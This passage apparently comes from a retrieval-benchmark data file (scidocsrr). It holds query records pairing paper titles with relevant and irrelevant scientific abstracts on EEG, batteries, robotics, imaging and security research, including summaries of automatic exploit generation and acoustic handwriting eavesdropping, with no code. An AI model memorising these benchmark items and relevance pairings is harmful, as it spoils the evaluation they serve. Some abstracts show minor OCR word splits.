"text": "Electric Vehicles (EVs) are projected as the most sustainable solutions for future transportation. EVs have many advantages over conventional hydrocarbon internal combustion engines including energy efficiency, environmental friendliness, noiselessness and less dependence on fossil fuels. However, there are also many challenges which are mainly related to the battery pack, such as battery cost, driving range, reliability, safety, battery capacity, cycle life, and recharge time. The performance of EVs is greatly dependent on the battery pack. Temperatures of the cells in a battery pack need to be maintained within its optimum operating temperature range in order to achieve maximum performance, safety and reliability under various operating conditions. Poor thermal management will affect the charging and discharging power, cycle life, cell balancing, capacity and fast charging capability of the battery pack. Hence, a thermal management system is needed in order to enhance the performance and to extend the life cycle of the battery pack. In this study, the effects of temperature on the Li-ion battery are investigated. Heat generated by LiFePO4 pouch cell was characterized using an EV accelerating rate calorimeter. Computational fluid dynamic analyses were carried out to investigate the performance of a liquid cooling system for a battery pack. The numerical simulations showed promising results and the design of the battery pack thermal management system was sufficient to ensure that the cells operated within their temperature limits.",
"title": ""
},
{
"docid": "bbf987eef74d76cf2916ae3080a2b174",
"text": "The facial system plays an important role in human-robot interaction. EveR-4 H33 is a head system for an android face controlled by thirty-three motors. It consists of three layers: a mechanical layer, an inner cover layer and an outer cover layer. Motors are attached under the skin and some motors are correlated with each other. Some expressions cannot be shown by moving just one motor. In addition, moving just one motor can cause damage to other motors or the skin. To solve these problems, a facial muscle control method that controls motors in a correlated manner is required. We designed a facial muscle control method and applied it to EveR-4 H33. We develop the actress robot EveR-4A by applying the EveR-4 H33 to the 24 degrees of freedom upper body and mannequin legs. EveR-4A shows various facial expressions with lip synchronization using our facial muscle control method.",
"title": ""
},
{
"docid": "69d826aa8309678cf04e2870c23a99dd",
"text": "Contemporary analyses of cell metabolism have called out three metabolites: ATP, NADH, and acetyl-CoA, as sentinel molecules whose accumulation represent much of the purpose of the catabolic arms of metabolism and then drive many anabolic pathways. Such analyses largely leave out how and why ATP, NADH, and acetyl-CoA (Figure 1 ) at the molecular level play such central roles. Yet, without those insights into why cells accumulate them and how the enabling properties of these key metabolites power much of cell metabolism, the underlying molecular logic remains mysterious. Four other metabolites, S-adenosylmethionine, carbamoyl phosphate, UDP-glucose, and Δ2-isopentenyl-PP play similar roles in using group transfer chemistry to drive otherwise unfavorable biosynthetic equilibria. This review provides the underlying chemical logic to remind how these seven key molecules function as mobile packets of cellular currencies for phosphoryl transfers (ATP), acyl transfers (acetyl-CoA, carbamoyl-P), methyl transfers (SAM), prenyl transfers (IPP), glucosyl transfers (UDP-glucose), and electron and ADP-ribosyl transfers (NAD(P)H/NAD(P)+) to drive metabolic transformations in and across most primary pathways. The eighth key metabolite is molecular oxygen (O2), thermodynamically activated for reduction by one electron path, leaving it kinetically stable to the vast majority of organic cellular metabolites.",
"title": ""
},
{
"docid": "51df36570be2707556a8958e16682612",
"text": "Through co-design of Augmented Reality (AR) based teaching material, this research aims to enhance collaborative learning experience in primary school education. It will introduce an interactive AR Book based on primary school textbook using tablets as the real time interface. The development of this AR Book employs co-design methods to involve children, teachers, educators and HCI experts from the early stages of the design process. Research insights from the co-design phase will be implemented in the AR Book design. The final outcome of the AR Book will be evaluated in the classroom to explore its effect on the collaborative experience of primary school students. The research aims to answer the question - Can Augmented Books be designed for primary school students in order to support collaboration? This main research question is divided into two sub-questions as follows - How can co-design methods be applied in designing Augmented Book with and for primary school children? And what is the effect of the proposed Augmented Book on primary school students' collaboration? This research will not only present a practical application of co-designing AR Book for and with primary school children, it will also clarify the benefit of AR for education in terms of collaborative experience.",
"title": ""
},
{
"docid": "3b03af1736709e536a4a58363102bc60",
"text": "Music transcription, as an essential component in music signal processing, contributes to wide applications in musicology, accelerates the development of commercial music industry, facilitates the music education as well as benefits extensive music lovers. However, the work relies on a lot of manual work due to heavy requirements on knowledge and experience. This project mainly examines two deep learning methods, DNN and LSTM, to automatize music transcription. We transform the audio files into spectrograms using constant Q transform and extract features from the spectrograms. Deep learning methods have the advantage of learning complex features in music transcription. The promising results verify that deep learning methods are capable of learning specific musical properties, including notes and rhythms. Keywords—automatic music transcription; deep learning; deep neural network (DNN); long shortterm memory networks (LSTM)",
"title": ""
},
{
"docid": "f560dbe8f3ff47731061d67b596ec7b0",
"text": "This paper considers the problem of fixed priority scheduling of periodic tasks with arbitrary deadlines. A general criterion for the schedulability of such a task set is given. Worst case bounds are given which generalize the Liu and Layland bound. The results are shown to provide a basis for developing predictable distributed real-time systems.",
"title": ""
}
] | scidocsrr |
c07d4fc01a91827bbddab461c5636c4e | Decoding hand movement velocity from electroencephalogram signals during a drawing task | [
{
"docid": "72e1db0153193956735c7906704c0907",
"text": "Eye movements, eye blinks, cardiac signals, muscle noise, and line noise present serious problems for electroencephalographic (EEG) interpretation and analysis when rejecting contaminated EEG segments results in an unacceptable data loss. Many methods have been proposed to remove artifacts from EEG recordings, especially those arising from eye movements and blinks. Often regression in the time or frequency domain is performed on parallel EEG and electrooculographic (EOG) recordings to derive parameters characterizing the appearance and spread of EOG artifacts in the EEG channels. Because EEG and ocular activity mix bidirectionally, regressing out eye artifacts inevitably involves subtracting relevant EEG signals from each record as well. Regression methods become even more problematic when a good regressing channel is not available for each artifact source, as in the case of muscle artifacts. Use of principal component analysis (PCA) has been proposed to remove eye artifacts from multichannel EEG. However, PCA cannot completely separate eye artifacts from brain signals, especially when they have comparable amplitudes. Here, we propose a new and generally applicable method for removing a wide variety of artifacts from EEG records based on blind source separation by independent component analysis (ICA). Our results on EEG data collected from normal and autistic subjects show that ICA can effectively detect, separate, and remove contamination from a wide variety of artifactual sources in EEG records with results comparing favorably with those obtained using regression and PCA methods. ICA can also be used to analyze blink-related brain activity.",
"title": ""
},
{
"docid": "c3bf2b73b2693c509c228293cd64ce3d",
"text": "In this work we present the first comprehensive survey of Brain Interface (BI) technology designs published prior to January 2006. Detailed results from this survey, which was based on the Brain Interface Design Framework proposed by Mason and Birch, are presented and discussed to address the following research questions: (1) which BI technologies are directly comparable, (2) what technology designs exist, (3) which application areas (users, activities and environments) have been targeted in these designs, (4) which design approaches have received little or no research and are possible opportunities for new technology, and (5) how well are designs reported. The results of this work demonstrate that meta-analysis of high-level BI design attributes is possible and informative. The survey also produced a valuable, historical cross-reference where BI technology designers can identify what types of technology have been proposed and by whom.",
"title": ""
}
] | [
{
"docid": "a3fafe73615c434375cd3f35323c939e",
"text": "In this paper, Magnetic Resonance Images,T2 weighte d modality , have been pre-processed by bilateral filter to reduce th e noise and maintaining edges among the different tissues. Four different t echniques with morphological operations have been applied to extra c the tumor region. These were: Gray level stretching and Sobel edge de tection, K-Means Clustering technique based on location and intensit y, Fuzzy C-Means Clustering, and An Adapted K-Means clustering techn ique and Fuzzy CMeans technique. The area of the extracted tumor re gions has been calculated. The present work showed that the four i mplemented techniques can successfully detect and extract the brain tumor and thereby help doctors in identifying tumor's size and region.",
"title": ""
},
{
"docid": "72e97d0f9f4ca19e4654e69b93729d71",
"text": "In this paper, we propose a novel cross-space affinity learning algorithm over different spaces with heterogeneous structures. Unlike most of affinity learning algorithms on the homogeneous space, we construct a cross-space tensor model to learn the affinity measures on heterogeneous spaces subject to a set of order constraints from the training pool. We further enhance the model with a factorization form which greatly reduces the number of parameters of the model with a controlled complexity. Moreover, from the practical perspective, we show the proposed factorized cross-space tensor model can be efficiently optimized by a series of simple quadratic optimization problems in an iterative manner. The proposed cross-space affinity learning algorithm can be applied to many real-world problems, which involve multiple heterogeneous data objects defined over different spaces. In this paper, we apply it into the recommendation system to measure the affinity between users and the product items, where a higher affinity means a higher rating of the user on the product. For an empirical evaluation, a widely used benchmark movie recommendation data set-MovieLens-is used to compare the proposed algorithm with other state-of-the-art recommendation algorithms and we show that very competitive results can be obtained.",
"title": ""
},
{
"docid": "a8122b8139b88ad5bff074d527b76272",
"text": "Salt is a natural component of the Australian landscape to which a number of biota inhabiting rivers and wetlands are adapted. Under natural flow conditions periods of low flow have resulted in the concentration of salts in wetlands and riverine pools. The organisms of these systems survive these salinities by tolerance or avoidance. Freshwater ecosystems in Australia are now becoming increasingly threatened by salinity because of rising saline groundwater and modification of the water regime reducing the frequency of high-flow (flushing) events, resulting in an accumulation of salt. Available data suggest that aquatic biota will be adversely affected as salinity exceeds 1000 mg L (1500 EC) but there is limited information on how increasing salinity will affect the various life stages of the biota. Salinisation can lead to changes in the physical environment that will affect ecosystem processes. However, we know little about how salinity interacts with the way nutrients and carbon are processed within an ecosystem. This paper updates the knowledge base on how salinity affects the physical and biotic components of aquatic ecosystems and explores the needs for information on how structure and function of aquatic ecosystems change with increasing salinity. BT0215 Ef ect of s al ini ty on f r eshwat er ecosys t em s in A us t rali a D. L. Niel e etal",
"title": ""
},
{
"docid": "e3f847a7c815772b909fcccbafed4af3",
"text": "The contribution of tumorigenic stem cells to haematopoietic cancers has been established for some time, and cells possessing stem-cell properties have been described in several solid tumours. Although chemotherapy kills most cells in a tumour, it is believed to leave tumour stem cells behind, which might be an important mechanism of resistance. For example, the ATP-binding cassette (ABC) drug transporters have been shown to protect cancer stem cells from chemotherapeutic agents. Gaining a better insight into the mechanisms of stem-cell resistance to chemotherapy might therefore lead to new therapeutic targets and better anticancer strategies.",
"title": ""
},
{
"docid": "e688dea8ba92a92f4d459c8c33f313e1",
"text": "Since the first description of Seasonal Affective Disorder (SAD) by Rosenthal et al. in the 1980s, treatment with daily administration of light, or Bright Light Therapy (BLT), has been proven effective and is now recognized as a first-line therapeutic modality. More recently, studies aimed at understanding the pathophysiology of SAD and the mechanism of action of BLT have implicated shifts in the circadian rhythm and alterations in serotonin reuptake. BLT has also been increasingly used as an experimental treatment in non-seasonal unipolar and bipolar depression and other psychiatric disorders with known or suspected alterations in the circadian system. This review will discuss the history of SAD and BLT, the proposed pathophysiology of SAD and mechanisms of action of BLT in the treatment of SAD, and evidence supporting the efficacy of BLT in the treatment of non-seasonal unipolar major depression, bipolar depression, eating disorders, and ADHD.",
"title": ""
},
{
"docid": "7bd091ed5539b90e5864308895b0d5d4",
"text": "We discuss the design of a high-performance field programmable gate array (FPGA) architecture that efficiently prototypes asynchronous (clockless) logic. In this FPGA architecture, low-level application logic is described using asynchronous dataflow functions that obey a token-based compute model. We implement these dataflow functions using finely pipelined asynchronous circuits that achieve high computation rates. This asynchronous dataflow FPGA architecture maintains most of the performance benefits of a custom asynchronous design, while also providing postfabrication logic reconfigurability. We report results for two asynchronous dataflow FPGA designs that operate at up to 400 MHz in a typical TSMC 0.25 /spl mu/m CMOS process.",
"title": ""
},
{
"docid": "16eaf32d33fc0781ea1a0bf9fde2a671",
"text": "As service chaining matures, interoperability is a must. Network service headers provide the required data-plane information needed to construct topologically independent service paths as well as to pass opaque metadata between classification and service functions.",
"title": ""
},
{
"docid": "0153f2fbf53c3919e22f08a60c5c6d5b",
"text": "Data mining aims at extracting knowledge from data. Information rich datasets, such as EBSCOhost Newspaper Source [3], carry a significant amount of multi-typed current and archived news data. This extracted information can easily be constructed into a heterogeneous information network. Through use of many mining techniques, deeper comprehension can then be unearthed from the underlying relationships between article, authors, tags, etc. This paper focuses on building on two such techniques, classification and embedding. GNetMine [1] is a common classification algorithm that is able to label entities of different types through a small set of training data. Node2Vec [5] is an embedding approach, using the many nodes and edges in a heterogeneous network, and converting them into a lowdimensional vector space, that can quickly and easily allow for comparison between nodes of any type. The goal of this paper is to combine these methods and compare and contrast the quality of output of Node2Vec with unlabeled data, directly from the heterogeneous network of EBSCOhost sports news data, as well as adding learned classification labels. Can nodes labeled using classification as an input to network embedding, improve the outcome of the embedding results?",
"title": ""
},
{
"docid": "2876086e4431e8607d5146f14f0c29dc",
"text": "Vascular ultrasonography has an important role in the diagnosis and management of venous disease. The venous system, however, is more complex and variable compared to the arterial system due to its frequent anatomical variations. This often becomes quite challenging for sonographers. This paper discusses the anatomy of the long saphenous vein and its anatomical variations accompanied by sonograms and illustrations.",
"title": ""
},
{
"docid": "b3b4e93b48914aa5844beae27a8af2b2",
"text": "http://ebmh.bmj.com/content/13/2/35.full.html Updated information and services can be found at: These include: References http://ebmh.bmj.com/content/13/2/35.full.html#ref-list-1 This article cites 30 articles, 9 of which can be accessed free at: service Email alerting box at the top right corner of the online article. Receive free email alerts when new articles cite this article. Sign up in the Notes",
"title": ""
},
{
"docid": "a926341e8b663de6c412b8e3a61ee171",
"text": "— Studies within the EHEA framework include the acquisition of skills such as the ability to learn autonomously, which requires students to devote much of their time to individual and group work to reinforce and further complement the knowledge acquired in the classroom. In order to consolidate the results obtained from classroom activities, lecturers must develop tools to encourage learning and facilitate the process of independent learning. The aim of this work is to present the use of virtual laboratories based on Easy Java Simulations to assist in the understanding and testing of electrical machines. con los usuarios integrándose fácilmente en plataformas de e-aprendizaje. Para nuestra aplicación hemos escogido el Java Ejs (Easy Java Simulations), ya que es una herramienta de software gratuita, diseñada para el desarrollo de laboratorios virtuales interactivos, dispone de elementos visuales parametrizables",
"title": ""
},
{
"docid": "edf52710738647f7ebd4c017ddf56c2c",
"text": "Tasks like search-and-rescue and urban reconnaissance benefit from large numbers of robots working together, but high levels of autonomy are needed in order to reduce operator requirements to practical levels. Reducing the reliance of such systems on human operators presents a number of technical challenges including automatic task allocation, global state and map estimation, robot perception, path planning, communications, and human-robot interfaces. This paper describes our 14-robot team, designed to perform urban reconnaissance missions, that won the MAGIC 2010 competition. This paper describes a variety of autonomous systems which require minimal human effort to control a large number of autonomously exploring robots. Maintaining a consistent global map, essential for autonomous planning and for giving humans situational awareness, required the development of fast loop-closing, map optimization, and communications algorithms. Key to our approach was a decoupled centralized planning architecture that allowed individual robots to execute tasks myopically, but whose behavior was coordinated centrally. In this paper, we will describe technical contributions throughout our system that played a significant role in the performance of our system. We will also present results from our system both from the competition and from subsequent quantitative evaluations, pointing out areas in which the system performed well and where interesting research problems remain.",
"title": ""
},
{
"docid": "6fad371eecbb734c1e54b8fb9ae218c4",
"text": "Quantitative Susceptibility Mapping (QSM) is a novel MRI based technique that relies on estimates of the magnetic field distribution in the tissue under examination. Several sophisticated data processing steps are required to extract the magnetic field distribution from raw MRI phase measurements. The objective of this review article is to provide a general overview and to discuss several underlying assumptions and limitations of the pre-processing steps that need to be applied to MRI phase data before the final field-to-source inversion can be performed. Beginning with the fundamental relation between MRI signal and tissue magnetic susceptibility this review covers the reconstruction of magnetic field maps from multi-channel phase images, background field correction, and provides an overview of state of the art QSM solution strategies.",
"title": ""
},
{
"docid": "e47574d102d581f3bc4a8b4ea304d216",
"text": "The paper proposes a high torque density design for variable flux machines with Alnico magnets. The proposed design uses tangentially magnetized magnets in order to achieve high air gap flux density and to avoid demagnetization by the armature field. Barriers are also inserted in the rotor to limit the armature flux and to allow the machine to utilize both reluctance and magnet torque components. An analytical procedure is first applied to obtain the initial machine design parameters. Then several modifications are applied to the stator and rotor designs through finite element simulations (FEA) in order to improve the machine efficiency and torque density.",
"title": ""
},
{
"docid": "98df036ec06b4a1de727e1c0dd87993d",
"text": "Coccidiosis is the bane of the poultry industry causing considerable economic loss. Eimeria species are known as protozoan parasites to cause morbidity and death in poultry. In addition to anticoccidial chemicals and vaccines, natural products are emerging as an alternative and complementary way to control avian coccidiosis. In this review, we update recent advances in the use of anticoccidial phytoextracts and phytocompounds, which cover 32 plants and 40 phytocompounds, following a database search in PubMed, Web of Science, and Google Scholar. Four plant products commercially available for coccidiosis are included and discussed. We also highlight the chemical and biological properties of the plants and compounds as related to coccidiosis control. Emphasis is placed on the modes of action of the anticoccidial plants and compounds such as interference with the life cycle of Eimeria, regulation of host immunity to Eimeria, growth regulation of gut bacteria, and/or multiple mechanisms. Biological actions, mechanisms, and prophylactic/therapeutic potential of the compounds and extracts of plant origin in coccidiosis are summarized and discussed.",
"title": ""
},
{
"docid": "f5d769be1305755fe0753d1e22cbf5c9",
"text": "The number of malware is increasing rapidly and a lot of malware use stealth techniques such as encryption to evade pattern matching detection by anti-virus software. To resolve the problem, behavior based detection method which focuses on malicious behaviors of malware have been researched. Although they can detect unknown and encrypted malware, they suffer a serious problem of false positives against benign programs. For example, creating files and executing them are common behaviors performed by malware, however, they are also likely performed by benign programs thus it causes false positives. In this paper, we propose a malware detection method based on evaluation of suspicious process behaviors on Windows OS. To avoid false positives, our proposal focuses on not only malware specific behaviors but also normal behavior that malware would usually not do. Moreover, we implement a prototype of our proposal to effectively analyze behaviors of programs. Our evaluation experiments using our malware and benign program datasets show that our malware detection rate is about 60% and it does not cause any false positives. Furthermore, we compare our proposal with completely behavior-based anti-virus software. Our results show that our proposal puts few burdens on users and reduces false positives.",
"title": ""
},
{
"docid": "4be5499f5aa6668c883162a9e6be0af9",
"text": "Mindfulness is increasingly being used for weight management. However, the strength of the evidence for such an approach is unclear; although mindfulness-based weight management programs have had some success, it is difficult to conclude that the mindfulness components were responsible. Research in this area is further complicated by the fact that the term 'mindfulness' is used to refer to a range of different practices. Additionally, we have little understanding of the mechanisms by which mindfulness might exert its effects. This review addresses these issues by examining research that has looked at the independent effects of mindfulness and mindfulness-related strategies on weight loss and weight management related eating behaviors. As well as looking at evidence for effects, the review also considers whether effects may vary with different types of strategy, and the kinds of mechanisms that may be responsible for any change. It is concluded that there is some evidence to support the effects of (a) present moment awareness, when applied to the sensory properties of food, and (b) decentering. However, research in these areas has yet to be examined in a controlled manner in relation to weight management.",
"title": ""
},
{
"docid": "4ee789cc3991783b8850ca8730f67656",
"text": "This paper investigates the use of data warehouse and business intelligence capabilities to integrate with customers in the supply chain and improve insights into customer sales. By making that same data warehouse sales information available to customers, this paper explores how the data warehouse can provide additional value to those customers, eliminating asymmetries of information in the supply chain. In addition, this paper investigates the evolution of data warehousing into business intelligence, expanding sales information to include marketing associate performance analysis generated for internal use. Further, this paper also examines a methodology that was used for building a business intelligence system. Finally, this paper investigates what appears to be a business intelligence driven focus on enterprise resource planning systems. These issues are illustrated using real world data warehousing and business intelligence artifacts developed at SYSCO.",
"title": ""
},
{
"docid": "65415effb35f9c8234f81fdef2916f42",
"text": "The scanpath comparison framework based on string editing is revisited. The previous method of clustering based on k-means \"preevaluation\" is replaced by the mean shift algorithm followed by elliptical modeling via Principal Components Analysis. Ellipse intersection determines cluster overlap, with fast nearest-neighbor search provided by the kd-tree. Subsequent construction of Y - matrices and parsing diagrams is fully automated, obviating prior interactive steps. Empirical validation is performed via analysis of eye movements collected during a variant of the Trail Making Test, where participants were asked to visually connect alphanumeric targets (letters and numbers). The observed repetitive position similarity index matches previously published results, providing ongoing support for the scanpath theory (at least in this situation). Task dependence of eye movements may be indicated by the global position index, which differs considerably from past results based on free viewing.",
"title": ""
},
{
"docid": "4e8fcf379ad69e6f70c11c60ebba1f0d",
"text": "In this paper, we introduce a transparent fingerprint sensing system using a thin film transistor (TFT) sensor panel, based on a self-capacitive sensing scheme. An armorphousindium gallium zinc oxide (a-IGZO) TFT sensor array and associated custom Read-Out IC (ROIC) are implemented for the system. The sensor panel has a 200 × 200 pixel array and each pixel size is as small as 50 μm × 50 μm. The ROIC uses only eight analog front-end (AFE) amplifier stages along with a successive approximation analog-to-digital converter (SAR ADC). To get the fingerprint image data from the sensor array, the ROIC senses a capacitance, which is formed by a cover glass material between a human finger and an electrode of each pixel of the sensor array. Three methods are reviewed for estimating the self-capacitance. The measurement result demonstrates that the transparent fingerprint sensor system has an ability to differentiate a human finger's ridges and valleys through the fingerprint sensor array.",
"title": ""
}
] | scidocsrr |
34763dedcdd145f20c66b07080b5f03d | Wiederverwendbarkeit von Programmieraufgaben durch Interoperabilität von Programmierlernsystemen | [
{
"docid": "4592c8f5758ccf20430dbec02644c931",
"text": "Taylor & Francis makes every effort to ensure the accuracy of all the information (the “Content”) contained in the publications on our platform. However, Taylor & Francis, our agents, and our licensors make no representations or warranties whatsoever as to the accuracy, completeness, or suitability for any purpose of the Content. Any opinions and views expressed in this publication are the opinions and views of the authors, and are not the views of or endorsed by Taylor & Francis. The accuracy of the Content should not be relied upon and should be independently verified with primary sources of information. Taylor and Francis shall not be liable for any losses, actions, claims, proceedings, demands, costs, expenses, damages, and other liabilities whatsoever or howsoever caused arising directly or indirectly in connection with, in relation to or arising out of the use of the Content.",
"title": ""
}
] | [
{
"docid": "3ccc5fd5bbf570a361b40afca37cec92",
"text": "Face detection techniques have been developed for decades, and one of remaining open challenges is detecting small faces in unconstrained conditions. The reason is that tiny faces are often lacking detailed information and blurring. In this paper, we proposed an algorithm to directly generate a clear high-resolution face from a blurry small one by adopting a generative adversarial network (GAN). Toward this end, the basic GAN formulation achieves it by super-resolving and refining sequentially (e.g. SR-GAN and cycle-GAN). However, we design a novel network to address the problem of super-resolving and refining jointly. We also introduce new training losses to guide the generator network to recover fine details and to promote the discriminator network to distinguish real vs. fake and face vs. non-face simultaneously. Extensive experiments on the challenging dataset WIDER FACE demonstrate the effectiveness of our proposed method in restoring a clear high-resolution face from a blurry small one, and show that the detection performance outperforms other state-of-the-art methods.",
"title": ""
},
{
"docid": "4d0921d8dd1004f0eed02df0ff95a092",
"text": "The “open classroom” emerged as a reaction against the industrial-era enclosed and authoritarian classroom. Although contemporary school architecture continues to incorporate and express ideas of openness, more research is needed about how teachers adapt to new and different built contexts. Our purpose is to identify teacher reaction to the affordances of open space learning environments. We outline a case study of teacher perceptions of working in new open plan school buildings. The case study demonstrates that affordances of open space classrooms include flexibility, visibility and scrutiny, and a de-emphasis of authority; teacher reactions included collective practice, team orientation, and increased interactions and a democratisation of authority. We argue that teacher reaction to the new open classroom features adaptability, intensification of day-to-day practice, and intraand inter-personal knowledge and skills.",
"title": ""
},
{
"docid": "cb85ae05ec32f40211d255f3452a6be1",
"text": "This paper presents a forward converter topology that employs a small resonant auxiliary circuit. The advantages of the proposed topology include soft switching in both the main and auxiliary switches, recovery of the leakage inductance energy, simplified power transformer achieving self-reset without using the conventional reset winding, simple gate drive and control circuit, etc. Steady-state analysis is performed herein, and a design procedure is presented for general applications. A 35–75-Vdc to 5 Vdc 100-W prototype converter switched at a frequency of 200 kHz is built to verify the design, and 90% overall efficiency has been obtained experimentally at full load.",
"title": ""
},
{
"docid": "18425da2e29b08565dde1459d11f6141",
"text": "Data flow is a natural paradigm for describing DSP applications for concurrent implementation on parallel hardware. Data flow programs for signal processing are directed graphs where each node represents a function and each arc represents a signal path. Synchronous data flow (SDF) is a special case of data flow (either atomic or large grain) in which the number of data samples produced or consumed by each node on each invocation is specified a priori. Nodes can be scheduled statically (at compile time) onto single or parallel programmable processors so the run-time overhead usually associated with data flow evaporates. Multiple sample rates within the same system are easily and naturally handled. Conditions for correctness of SDF graph are explained and scheduling algorithms are described for homogeneous parallel processors sharing memory. A preliminary SDF software system for automatically generating assembly language code for DSP microcomputers is described. Two new efficiency techniques are introduced, static buffering and an extension to SDF to efficiently implement conditionals.",
"title": ""
},
{
"docid": "7b2167017ca1ab1c535d4df33457f368",
"text": "We present a method for simulating quasistatic crack propagation in 2-D which combines the extended finite element method (XFEM) with a general algorithm for cutting triangulated domains, and introduce a simple yet general and flexible quadrature rule based on the same geometric algorithm. The combination of these methods gives several advantages. First, the cutting algorithm provides a flexible and systematic way of determining material connectivity, which is required by the XFEM enrichment functions. Also, our integration scheme is straightfoward to implement and accurate, without requiring a triangulation that incorporates the new crack edges or the addition of new degrees of freedom to the system. The use of this cutting algorithm and integration rule allows for geometrically complicated domains and complex crack patterns. Copyright c © 2009 John Wiley & Sons, Ltd.",
"title": ""
},
{
"docid": "96c14e4c9082920edb835e85ce99dc21",
"text": "When filling out privacy-related forms in public places such as hospitals or clinics, people usually are not aware that the sound of their handwriting leaks personal information. In this paper, we explore the possibility of eavesdropping on handwriting via nearby mobile devices based on audio signal processing and machine learning. By presenting a proof-of-concept system, WritingHacker, we show the usage of mobile devices to collect the sound of victims' handwriting, and to extract handwriting-specific features for machine learning based analysis. WritingHacker focuses on the situation where the victim's handwriting follows certain print style. An attacker can keep a mobile device, such as a common smart-phone, touching the desk used by the victim to record the audio signals of handwriting. Then the system can provide a word-level estimate for the content of the handwriting. To reduce the impacts of various writing habits and writing locations, the system utilizes the methods of letter clustering and dictionary filtering. Our prototype system's experimental results show that the accuracy of word recognition reaches around 50% - 60% under certain conditions, which reveals the danger of privacy leakage through the sound of handwriting.",
"title": ""
},
{
"docid": "aa25ab7078969c54d84aa7e4b2650f9e",
"text": "Informative art is computer augmented, or amplified, works of art that not only are aesthetical objects but also information displays, in as much as they dynamically reflect information about their environment. Informative art can be seen as a kind of slow technology, i.e. a technology that promotes moments of concentration and reflection. Our aim is to present the design space of informative art. We do so by discussing its properties and possibilities in relation to work on information visualisation, novel information display strategies, as well as art. A number of examples based on different kinds of mapping relations between information and the properties of the composition of an artwork are described.",
"title": ""
},
{
"docid": "d9710b9a214d95c572bdc34e1fe439c4",
"text": "This paper presents a new method, capable of automatically generating attacks on binary programs from software crashes. We analyze software crashes with a symbolic failure model by performing concolic executions following the failure directed paths, using a whole system environment model and concrete address mapped symbolic memory in S2 E. We propose a new selective symbolic input method and lazy evaluation on pseudo symbolic variables to handle symbolic pointers and speed up the process. This is an end-to-end approach able to create exploits from crash inputs or existing exploits for various applications, including most of the existing benchmark programs, and several large scale applications, such as a word processor (Microsoft office word), a media player (mpalyer), an archiver (unrar), or a pdf reader (foxit). We can deal with vulnerability types including stack and heap overflows, format string, and the use of uninitialized variables. Notably, these applications have become software fuzz testing targets, but still require a manual process with security knowledge to produce mitigation-hardened exploits. Using this method to generate exploits is an automated process for software failures without source code. The proposed method is simpler, more general, faster, and can be scaled to larger programs than existing systems. We produce the exploits within one minute for most of the benchmark programs, including mplayer. We also transform existing exploits of Microsoft office word into new exploits within four minutes. The best speedup is 7,211 times faster than the initial attempt. For heap overflow vulnerability, we can automatically exploit the unlink() macro of glibc, which formerly requires sophisticated hacking efforts.",
"title": ""
},
{
"docid": "de9c4e83639f399fe8b11af450b86283",
"text": "This paper deals with sentence-level sentiment classification. Though a variety of neural network models have been proposed recently, however, previous models either depend on expensive phrase-level annotation, most of which has remarkably degraded performance when trained with only sentence-level annotation; or do not fully employ linguistic resources (e.g., sentiment lexicons, negation words, intensity words). In this paper, we propose simple models trained with sentence-level annotation, but also attempt to model the linguistic role of sentiment lexicons, negation words, and intensity words. Results show that our models are able to capture the linguistic role of sentiment words, negation words, and intensity words in sentiment expression.",
"title": ""
},
{
"docid": "8acb81776a84e7037fcd72a991a6febf",
"text": "This letter presents a new filtering scheme based on contrast enhancement within the filtering window for removing the random valued impulse noise. The application of a nonlinear function for increasing the difference between a noise-free and noisy pixels results in efficient detection of noisy pixels. As the performance of a filtering system, in general, depends on the number of iterations used, an effective stopping criterion based on noisy image characteristics to determine the number of iterations is also proposed. Extensive simulation results exhibit that the proposed method significantly outperforms many other well-known techniques.",
"title": ""
},
{
"docid": "74fd30bb5ef306968dcf05e5ea32c9d6",
"text": "Depth of field is the swath through a 3D scene that is imaged in acceptable focus through an optics system, such as a camera lens. Control over depth of field is an important artistic tool that can be used to emphasize the subject of a photograph. In a real camera, the control over depth of field is limited by the laws of physics and by physical constraints. The depth of field effect has been simulated in computer graphics, but with the same limited control as found in real camera lenses. In this report, we use anisotropic diffusion to generalize depth of field in computer graphics by allowing the user to independently specify the degree of blur at each point in three-dimensional space. Generalized depth of field provides a novel tool to emphasize an area of interest within a 3D scene, to pick objects out of a crowd, and to render a busy, complex picture more understandable by focusing only on relevant details that may be scattered throughout the scene. Our algorithm operates by blurring a sequence of nonplanar layers that form the scene. Choosing a suitable blur algorithm for the layers is critical; thus, we develop appropriate blur semantics such that the blur algorithm will properly generalize depth of field. We found that anisotropic diffusion is the process that best suits these semantics.",
"title": ""
},
{
"docid": "5d679f76b7e5058d234a125ec48e7ea9",
"text": "Road traffic accidents are a major public health concern, resulting in an estimated 1.2 million deaths and 50 million injuries worldwide each year. In the developing world, road traffic accidents are among the leading cause of death and injury. The objective of this study is to evaluate a set of variable that contribute to the degree of accident severity in traffic crashes. The issue of traffic safety has raised great concerns across the sustainable development of modern traffic and transportation. The study on road traffic accident cause can identify the key factors rapidly, efficiently and provide instructional methods to the traffic accident prevention and road traffic accident reduction, which could greatly reduce personal casualty by road traffic accidents. Using the methods of traffic data analysis, can improve the road traffic safety management level effectively.",
"title": ""
},
{
"docid": "fbf30d2032b0695b5ab2d65db2fe8cbc",
"text": "Artificial Intelligence for computer games is an interesting topic which attracts intensive attention recently. In this context, Mario AI Competition modifies a Super Mario Bros game to be a benchmark software for people who program AI controller to direct Mario and make him overcome the different levels. This competition was handled in the IEEE Games Innovation Conference and the IEEE Symposium on Computational Intelligence and Games since 2009. In this paper, we study the application of Reinforcement Learning to construct a Mario AI controller that learns from the complex game environment. We train the controller to grow stronger for dealing with several difficulties and types of levels. In controller developing phase, we design the states and actions cautiously to reduce the search space, and make Reinforcement Learning suitable for the requirement of online learning.",
"title": ""
},
{
"docid": "fc1c3291c631562a6d1b34d5b5ccd27e",
"text": "There are many methods for making a multicast protocol “reliable.” At one end of the spectrum, a reliable multicast protocol might offer tomicity guarantees, such as all-or-nothing delivery, delivery ordering, and perhaps additional properties such as virtually synchronous addressing. At the other are protocols that use local repair to overcome transient packet loss in the network, offering “best effort” reliability. Yet none of this prior work has treated stability of multicast delivery as a basic reliability property, such as might be needed in an internet radio, television, or conferencing application. This article looks at reliability with a new goal: development of a multicast protocol which is reliable in a sense that can be rigorously quantified and includes throughput stability guarantees. We characterize this new protocol as a “bimodal multicast” in reference to its reliability model, which corresponds to a family of bimodal probability distributions. Here, we introduce the protocol, provide a theoretical analysis of its behavior, review experimental results, and discuss some candidate applications. These confirm that bimodal multicast is reliable, scalable, and that the protocol provides remarkably stable delivery throughput.",
"title": ""
},
{
"docid": "3573fb077b151af3c83f7cd6a421dc9c",
